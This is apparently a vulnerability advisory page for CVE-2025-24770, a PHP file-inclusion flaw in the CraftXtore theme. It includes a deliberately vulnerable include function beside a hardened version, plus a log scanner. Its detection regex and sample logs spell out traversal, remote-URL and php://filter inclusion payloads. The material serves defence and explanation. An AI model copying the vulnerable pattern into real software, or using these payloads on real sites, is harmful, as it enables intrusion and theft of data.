CVE-2025-24770: CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') in BZOTheme CraftXtore

High
Tags: Vulnerability, CVE-2025-24770, cve, cve-2025-24770, cwe-98
Published: Mon Jun 09 2025 (06/09/2025, 15:56:55 UTC)
Source: CVE Database V5
Vendor/Project: BZOTheme
Product: CraftXtore

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in BZOTheme CraftXtore allows PHP Local File Inclusion. This issue affects CraftXtore: from n/a through 1.7.

AI-Powered Analysis

AI analysis last updated: 07/11/2025, 01:32:33 UTC

Technical Analysis

CVE-2025-24770 is a high-severity vulnerability classified under CWE-98, which covers improper control of the filename used in include or require statements within PHP programs. It affects the BZOTheme CraftXtore product in versions up to 1.7. The flaw allows for PHP Remote File Inclusion (RFI), enabling an attacker to make the affected server include and execute arbitrary PHP code from a remote source. It arises because the application does not properly validate or sanitize the user-supplied input that determines the filename or URL passed to include/require, so a crafted request can cause the server to fetch and execute code from an external location. The CVSS 3.1 base score of 8.1 reflects high impact on confidentiality, integrity, and availability, with a network attack vector, no privileges required and no user interaction, but high attack complexity. Exploitation can lead to full system compromise, data theft, defacement, or use of the server as a pivot point for further attacks. Although no exploits are currently reported in the wild, RFI vulnerabilities are attractive targets for attackers. The vulnerability was publicly disclosed on June 9, 2025, and affects all versions of CraftXtore up to 1.7; no patch links are currently available, so users must apply mitigations or await vendor fixes.
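To make the CWE-98 mechanism concrete, the following is an added illustration written for this page; it is not CraftXtore code and does not reproduce the theme's actual vulnerable path. It shows the textbook unsafe pattern (an include target taken straight from the request) next to a hardened replacement that maps the request value onto a fixed allowlist and verifies the resolved path stays inside the template directory. The parameter name `page`, the `templates/` directory and the allowlist entries are assumptions chosen for the example.

```php
<?php
declare(strict_types=1);

// Added example for CVE-2025-24770 / CWE-98. Not CraftXtore code; the parameter
// name "page", the templates directory and the allowlist are assumptions.

// VULNERABLE PATTERN: the include target is taken directly from the request.
// With allow_url_include=On the value may be a URL (remote file inclusion);
// with it Off an attacker can still walk the local filesystem (local file
// inclusion, as the CVE description states).
function render_page_vulnerable(array $query): void
{
    $page = $query['page'] ?? 'home';
    include $page . '.php';   // CWE-98: filename under request control
}

// HARDENED PATTERN: allowlist plus canonical-path check.
const TEMPLATE_DIR   = __DIR__ . '/templates';
const ALLOWED_PAGES  = ['home', 'about', 'contact'];

// Returns the absolute template path for an allowlisted page name, or null.
function resolve_template($page): ?string
{
    if (!is_string($page) || !in_array($page, ALLOWED_PAGES, true)) {
        return null;                         // not a string or not on the allowlist
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $page . '.php');
    if ($base === false || $path === false) {
        return null;                         // directory or template file missing
    }
    // realpath() collapses ".." and symlinks; the prefix check defeats traversal
    // even if the allowlist is later extended carelessly.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_page_hardened(array $query): void
{
    $path = resolve_template($query['page'] ?? 'home');
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;                            // only ever a vetted local file
}

// Defence in depth at the runtime level (php.ini, not settable via ini_set()):
//   allow_url_include = Off   ; default since PHP 7.4, blocks include of URLs
//   allow_url_fopen   = Off   ; if the application does not need HTTP wrappers

// CLI demonstration with constructed inputs.
if (PHP_SAPI === 'cli') {
    foreach (['home', '../../etc/passwd', 'http://203.0.113.5/x', ['x']] as $probe) {
        printf("%-24s => %s\n", json_encode($probe), var_export(resolve_template($probe), true));
    }
}
```

Only `home` can ever reach `include`, and only if `templates/home.php` actually exists under the expected directory; every other probe resolves to `null` before any file is touched. The `php.ini` settings are a second, independent layer: they do not fix the application logic, but they remove the remote-fetch primitive that turns an include bug into RFI.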

Potential Impact

For European organizations using BZOTheme CraftXtore, this vulnerability poses a significant risk. Successful exploitation can lead to unauthorized remote code execution, resulting in data breaches, service disruption, and potential lateral movement within corporate networks. Given the high confidentiality and integrity impact, sensitive customer data, intellectual property, and internal systems could be compromised. The availability impact also means critical e-commerce or content management services powered by CraftXtore could be taken offline or manipulated, causing operational and reputational damage. European data protection regulations such as GDPR impose strict requirements on data security and breach notification, so exploitation could also lead to regulatory penalties and loss of customer trust. Organizations in sectors with high online presence, such as retail, media, and government services, are particularly vulnerable due to their reliance on web applications and potential attractiveness to attackers.

Mitigation Recommendations

Immediate mitigation steps include disabling any functionality that allows dynamic inclusion of files based on user input. Organizations should implement strict input validation and sanitization so that only allowed, local file paths are processed; an allowlist of permitted include targets prevents arbitrary file inclusion. Web application firewalls (WAFs) should be configured to detect and block requests that match remote file inclusion patterns. Monitoring web server logs for unusual include or require requests can help identify exploitation attempts. Until an official patch is released, consider isolating affected systems and restricting outbound HTTP/HTTPS traffic from the web server so that remote malicious code cannot be fetched. Updating to newer versions of CraftXtore once available, or applying vendor-provided patches, is critical. A thorough security review of all PHP include/require usage in custom code is also recommended to prevent similar vulnerabilities.
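The log-monitoring recommendation above can be turned into a small triage script. The following is an added example written for this page, not a tool from the vendor or the advisory source: it parses Apache/nginx "combined" access-log lines, looks at a set of parameter names commonly used for template selection, and flags values that look like URLs, PHP stream wrappers or directory traversal. The parameter names, the regular expression and the sample log lines are all constructed assumptions and should be tuned to the application actually deployed.

```php
<?php
declare(strict_types=1);

// Added example: detect include-style parameters carrying RFI/LFI-looking values
// in access logs. Parameter names and patterns are assumptions, not CraftXtore's.

const INCLUDE_PARAMS = ['page', 'file', 'template', 'path', 'view', 'include'];

// Remote URL, PHP stream wrapper, or traversal (plain or percent-encoded).
const SUSPICIOUS_VALUE =
    '~^(?:https?|ftp)://|^(?:php|data|expect|phar|zip)://|(?:\.\./|%2e%2e%2f|%2e%2e/)~i';

// Parses one "combined" log line into its interesting fields, or null if malformed.
function parse_log_line(string $line): ?array
{
    $re = '~^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})~';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'target' => $m[4], 'status' => (int) $m[5]];
}

// Returns one hit per (request, parameter) pair whose value matches SUSPICIOUS_VALUE.
function find_inclusion_attempts(iterable $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $req = parse_log_line($line);
        if ($req === null) {
            continue;
        }
        $qpos = strpos($req['target'], '?');
        if ($qpos === false) {
            continue;                               // no query string at all
        }
        parse_str(substr($req['target'], $qpos + 1), $params);   // decodes once
        foreach (INCLUDE_PARAMS as $name) {
            $value = $params[$name] ?? null;
            // rawurldecode() again catches double-encoded traversal sequences.
            if (is_string($value) && preg_match(SUSPICIOUS_VALUE, rawurldecode($value))) {
                $hits[] = ['ip' => $req['ip'], 'time' => $req['time'], 'param' => $name,
                           'value' => $value, 'status' => $req['status']];
            }
        }
    }
    return $hits;
}

// Constructed sample log lines (documentation-range IPs, invalid TLD).
const SAMPLE_LOG = [
    '198.51.100.7 - - [09/Jun/2025:15:56:55 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [09/Jun/2025:15:57:01 +0000] "GET /index.php?page=http://203.0.113.5/x.txt HTTP/1.1" 200 188 "-" "curl/8.0"',
    '203.0.113.5 - - [09/Jun/2025:15:57:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 12 "-" "curl/8.0"',
    '203.0.113.5 - - [09/Jun/2025:15:57:03 +0000] "GET /index.php?template=php://filter/read=convert.base64-encode/resource=index HTTP/1.1" 200 2201 "-" "curl/8.0"',
    '198.51.100.9 - - [09/Jun/2025:15:58:10 +0000] "POST /cart.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
];

if (PHP_SAPI === 'cli') {
    $lines = $argc > 1 ? new SplFileObject($argv[1]) : SAMPLE_LOG;   // real log file or the constructed sample
    foreach (find_inclusion_attempts($lines) as $hit) {
        printf("%s %-15s %-8s %-9s %s\n",
            $hit['time'], $hit['ip'], $hit['param'], "status={$hit['status']}", $hit['value']);
    }
}
```

Run against the embedded sample, the script reports the three requests from `203.0.113.5` and ignores the two legitimate ones. The HTTP status column matters for triage: a `200` on a URL- or wrapper-valued include parameter deserves immediate attention, because on a host where `allow_url_include` is enabled it may mean the remote code was fetched and executed, whereas a `404` suggests the attempt did not resolve to a file.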

Technical Details

Data Version
5.1
Assigner Short Name
Patchstack
Date Reserved
2025-01-23T14:53:16.440Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 68487f581b0bd07c3938a801

Added to database: 6/10/2025, 6:54:16 PM

Last enriched: 7/11/2025, 1:32:33 AM

Last updated: 8/8/2025, 10:55:58 AM
